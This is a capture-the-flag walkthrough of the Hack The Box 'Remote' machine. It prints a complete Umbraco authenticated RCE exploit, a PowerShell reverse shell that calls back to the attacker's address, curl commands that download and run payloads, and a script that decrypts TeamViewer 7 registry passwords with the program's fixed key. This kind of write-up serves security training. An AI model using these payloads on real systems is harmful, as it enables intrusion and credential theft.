Remote is an easy Windows box released back in March 2020.
As always, we begin our enumeration with Nmap to find the open ports. We use the flag -sC for the default scripts and -sV for version detection.
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ nmap -vvv -p- 10.10.10.180 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 49666/tcp on 10.10.10.180
Discovered open port 49678/tcp on 10.10.10.180
Discovered open port 5985/tcp on 10.10.10.180
Discovered open port 47001/tcp on 10.10.10.180
Discovered open port 49667/tcp on 10.10.10.180
Discovered open port 49665/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180
Discovered open port 49664/tcp on 10.10.10.180
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ nmap -sCV 10.10.10.180 -p 21,80,111,135,445,2049
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 18:12 CEST
Nmap scan report for 10.10.10.180
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7m35s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-30T16:21:22
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.57 seconds
Our nmap scan picked up port 21 (FTP) with anonymous login allowed, so we can recursively fetch whatever is there with wget:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ wget -r ftp://anonymous:anonymous@10.10.10.180/
However, there are no files to get, so we continue with port 80 instead:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ gobuster dir -u http://10.10.10.180 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.180
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/30 18:42:03 Starting gobuster in directory enumeration mode
===============================================================
/Blog (Status: 200) [Size: 5001]
/Contact (Status: 200) [Size: 7880]
/Home (Status: 200) [Size: 6703]
/People (Status: 200) [Size: 6749]
/Products (Status: 200) [Size: 5338]
/about-us (Status: 200) [Size: 5451]
/blog (Status: 200) [Size: 5011]
/contact (Status: 200) [Size: 7890]
/home (Status: 200) [Size: 6703]
/install (Status: 302) [Size: 126] [--> /umbraco/]
/intranet (Status: 200) [Size: 3323]
/master (Status: 500) [Size: 3420]
/people (Status: 200) [Size: 6739]
/person (Status: 200) [Size: 2741]
/product (Status: 500) [Size: 3420]
/products (Status: 200) [Size: 5328]
/render/https://www.google.com (Status: 400) [Size: 3420]
/umbraco (Status: 200) [Size: 4040]
===============================================================
2021/05/30 18:43:05 Finished
===============================================================
Here we see that gobuster picked up the /umbraco/ directory, although we don't have credentials to get in yet.
Our nmap scan also showed NFS (rpcbind on port 111, nfs/mountd on port 2049), so let's enumerate the exports with the showmount utility:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ apt search showmount
Sorting... Done
Full Text Search... Done
nfs-common/kali-rolling,now 1:1.3.4-5 amd64 [installed,automatic]
NFS support files common to client and server
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ sudo apt install nfs-common -y
[sudo] password for nothing:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
nfs-common is already the newest version (1:1.3.4-5).
nfs-common set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
Here we see a mountable folder called site_backups, so let's mount it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ mkdir backups
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ sudo mount -t nfs 10.10.10.180:/site_backups backups/
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ ls -lash backups
total 123K
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 23 2020 .
4.0K drwxr-xr-x 4 nothing nothing 4.0K May 30 19:40 ..
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Data
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Plugins
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client
48K drwx------ 2 nobody 4294967294 48K Feb 20 2020 bin
8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Config
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 css
512 -rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
512 -rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Media
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts
8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Umbraco
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Umbraco_Client
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Views
28K -rwx------ 1 nobody 4294967294 28K Feb 20 2020 Web.config
Looking through the files we see several Umbraco directories, and after a bit of searching online we find that Umbraco can keep its database in the App_Data folder as Umbraco.sdf:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ strings backups/App_Data/Umbraco.sdf| grep Administrator
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminAdministratorsCADMOSKTPIURZ:5F7
Here we see that the Administrator user's password hash is SHA1 (the hashAlgorithm field next to it says so), so let's attempt to crack it using john:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat hash.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ john hash.txt --format=Raw-SHA1 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:00 DONE (2021-05-30 19:47) 1.282g/s 12594Kp/s 12594Kc/s 12594KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
And we found the Administrator password for Umbraco: baconandcheese, so let's log in:
Clicking help at the bottom left corner, we can see the version of this Umbraco instance:
And so we can look for CVEs for that Umbraco version:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ searchsploit umbraco
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execu | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authentica | aspx/webapps/49488.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scrip | php/webapps/44988.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results
And we get a few exploits for our Umbraco instance! Let's try the first authenticated RCE exploit (46153.py):
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cp $(locate 46153.py) .
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat 46153.py
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
import requests
from bs4 import BeautifulSoup


def print_dict(dico):
    print(dico.items())


print("Start")
# PoC payload: the original exploit popped a calc, here it runs a wget callback to us
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "wget 10.10.14.13/your_rce_attempt_worked!"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> '
login = "admin@htb.local"
password = "baconandcheese"
host = "http://10.10.10.180"
# Step 1 - Get Main page
s = requests.session()
url_main = host + "/umbraco/"
r1 = s.get(url_main)
print_dict(r1.cookies)
# Step 2 - Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = {"username": login, "password": password}
r2 = s.post(url_login, json=loginfo)
# Step 3 - Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)
soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = {"__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE, "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR, "ctl00$body$xsltSelection": payload, "ctl00$body$contentPicker$ContentIdValue": "", "ctl00$body$visualizeDo": "Visualize+XSLT"}
# Step 4 - Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)
print("End")
Make sure you edit the values of login, password and host, as well as the powershell.exe command and the wget callback URL (your tun0 address and a file name of your choice) in the script above, then run it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 46153.py
Start
[]
End
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ sudo python3 -m http.server 80
[sudo] password for nothing:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.180 - - [31/May/2021 06:48:29] code 404, message File not found
10.10.10.180 - - [31/May/2021 06:48:29] "GET /your_rce_attempt_worked! HTTP/1.1" 404 -
After running it we see that we got the machine to execute the wget command back to us. However, noraj wrote a much better rewrite of this Umbraco RCE Python exploit that lets us pass arguments:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
--2021-05-31 07:07:53-- https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3202 (3.1K) [text/plain]
Saving to: ‘exploit.py’
exploit.py 100%[======================================================================================================================================================>] 3.13K --.-KB/s in 0s
2021-05-31 07:07:53 (6.52 MB/s) - ‘exploit.py’ saved [3202/3202]
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]
Umbraco authenticated RCE
optional arguments:
-h, --help show this help message and exit
-u USER, --user USER username / email
-p PASS, --password PASS password
-i URL, --host URL root URL
-c CMD, --command CMD command
-a ARGS, --arguments ARGS arguments
So let's use it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command whoami'
iis apppool\defaultapppool
We see that we can get remote code execution as the apppool user. Let's also pull the system information:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command systeminfo'
Host Name: REMOTE
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA801
Original Install Date: 2/19/2020, 4:03:29 PM
System Boot Time: 5/30/2021, 12:07:27 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 4 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,745 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,426 MB
Virtual Memory: In Use: 1,373 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB4534119
[02]: KB4462930
[03]: KB4516115
[04]: KB4523204
[05]: KB4464455
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.180
[02]: fe80::108b:625:aa40:7e42
[03]: dead:beef::108b:625:aa40:7e42
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
We are also able to print information about the server itself, including the installed hotfixes. But first we need a reverse shell on the box, so let's find where the FTP folder is:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/'
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 5/30/2021 11:07 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM Windows
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/ftp_transfer'
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command new-item c:/ftp_transfer/test.txt'
Directory: C:\ftp_transfer
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/31/2021 1:45 AM 0 test.txt
As you can see, we are able to write to the C:\ftp_transfer directory, so let's make use of it. First we create our PowerShell script containing the reverse shell payload locally:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ vim shell.ps1
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.13",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
This will connect back to our tun0 interface on port 9001 once we get the box to execute it. To get it there, we download the script into the ftp_transfer directory we found earlier:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command curl http://10.10.14.13:9090/shell.ps1 -o c:/ftp_transfer/shell.ps1'
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ ls -lash shell.ps1
4.0K -rw-r--r-- 1 nothing nothing 482 May 31 07:50 shell.ps1
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.10.10.180 - - [31/May/2021 07:53:26] "GET /shell.ps1 HTTP/1.1" 200 -
Now that our shell.ps1 got uploaded, let's execute it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command c:/ftp_transfer/shell.ps1'
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.180] 49854
whoami
iis apppool\defaultapppool
And we got a reverse shell connection!
# cd c:\users\public
# ls
Directory: C:\users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 5/30/2021 12:08 PM 34 user.txt
# cat user.txt
67XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we managed to get the user flag!
Now, in order to escalate privileges to the Administrator user on this box, we're going to run winPEAS:
[ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
→ cp $(locate winPEAS.ps1) .
[ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
→ ls -lash Invoke-winPEAS.ps1
228K -rw-r--r-- 1 nothing nothing 228K May 31 09:00 Invoke-winPEAS.ps1
[ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Remote]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
# cd C:\ftp_transfer
# curl http://10.10.14.13:9090/Invoke-winPEAS.ps1 -o peas.ps1
# import-module ./peas.ps1
# Invoke-winPEAS
So we downloaded the winPEAS PowerShell module onto the box and imported it, which gave us the Invoke-winPEAS command to run:
winPEAS immediately listed 9 potential CVEs on the box:
However, one of the intended privesc paths is the TeamViewer 7 application that's installed on the box:
# cd 'C:\Program Files (x86)\TeamViewer\'
# ls
Directory: C:\Program Files (x86)\TeamViewer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/31/2021 12:54 AM Version7
We're going to take advantage of this TeamViewer 7 installation to privesc to the Administrator user, as described in this blog post:
First of all, TeamViewer 7 stores its password in the registry under the value SecurityPasswordAES. That value is encrypted with AES-128-CBC using the fixed key 0602000000a400005253413100040000 and the initialization vector 0100010067244F436E6762F25EA8D704. A quick search shows that the TeamViewer registry key lives under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer:
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
StartMenuGroup REG_SZ TeamViewer 7
InstallationDate REG_SZ 2020-02-20
InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
Always_Online REG_DWORD 0x1
Security_ActivateDirectIn REG_DWORD 0x0
Version REG_SZ 7.0.43148
ClientIC REG_DWORD 0x11f25831
LastMACUsed REG_MULTI_SZ \0005056B9A169
MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion REG_DWORD 0x1
ClientID REG_DWORD 0x6972e4aa
CUse REG_DWORD 0x1
LastUpdateCheck REG_DWORD 0x5e72893c
UsageEnvironmentBackup REG_DWORD 0x1
SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
MultiPwdMgmtIDs REG_MULTI_SZ admin
MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
Security_PasswordStrength REG_DWORD 0x3
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings
We can already see it, but let's filter the query down to just the value we want:
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7 /v SecurityPasswordAES
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
Now that we have it, we can use the Python script from the aforementioned blog post to decrypt the password:
import hexdump, binascii
from Crypto.Cipher import AES  # pip3 install pycryptodome hexdump


class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)


# Fixed AES-128-CBC key and IV used by TeamViewer 7
key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
# SecurityPasswordAES value pulled from the registry above
hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"
ciphertext = binascii.unhexlify(hex_str_cipher)
raw_un = AESCipher(key).decrypt(iv, ciphertext)
# hexdump.hexdump() prints the dump itself and returns None (hence the "None" line in the output)
print(hexdump.hexdump(raw_un))
# The plaintext is UTF-16 with null padding up to the block size
password = raw_un.decode('utf-16')
print(password)
[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ pip3 install pycryptodome hexdump
Requirement already satisfied: pycryptodome in /home/nothing/.local/lib/python3.9/site-packages (3.10.1)
Requirement already satisfied: hexdump in /home/nothing/.local/lib/python3.9/site-packages (3.3)
[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ python3 decrypt.py
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
None
!R3m0te!
And we found the password! Now let's use it with Evil-WinRM:
[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
Here we can see the progress graph: